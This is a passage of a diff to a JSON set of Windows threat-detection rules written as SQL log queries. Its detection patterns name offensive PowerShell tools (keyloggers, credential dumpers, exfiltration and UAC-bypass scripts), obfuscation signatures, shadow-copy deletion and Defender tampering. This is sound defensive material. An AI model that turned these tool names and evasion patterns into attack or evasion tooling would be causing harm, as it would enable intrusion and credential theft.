'\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection 
Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" 
+ "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" 
], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious 
changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": 
"bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and 
\"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - 
"id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use 
Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE 